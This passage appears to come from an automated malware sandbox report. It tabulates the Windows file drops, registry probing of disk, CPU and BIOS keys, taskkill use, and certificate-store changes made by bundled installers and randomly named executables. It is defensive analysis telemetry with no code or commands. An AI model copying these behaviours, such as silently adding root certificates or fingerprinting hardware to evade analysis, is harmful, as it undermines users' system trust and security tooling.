| File opened for modification | C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe | C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe | N/A |
| File created | C:\Program Files (x86)\MaskVPN\is-BLRRD.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\win732\is-O17R6.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\MaskVPN\driver\winxp64\is-RHO5I.tmp | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| File created | C:\Program Files (x86)\Sofware IN LLC\is-7LG0A.tmp | C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp | N/A |
| File created | C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe | C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe | C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI5262.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\INF\setupapi.dev.log | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| File created | C:\Windows\AppCompat\Programs\Amcache.hve.tmp | C:\Windows\SysWOW64\WerFault.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setupact.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File opened for modification | C:\Windows\LOGS\DPX\setuperr.log | C:\Windows\SysWOW64\expand.exe | N/A |
| File created | C:\Windows\Installer\f764801.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\f764801.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Program crash
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\ConfigFlags | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&135b206d&0&000000\CompatibleIDs | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&135B206D&0&010000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&135B206D&0&000000 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&135b206d&0&010000\HardwareID | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\system32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Windows\SysWOW64\WerFault.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\system32\rundll32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\system32\rundll32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections | C:\Windows\System32\svchost.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\System32\sihclient.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\System32\sihclient.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ | N/A | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
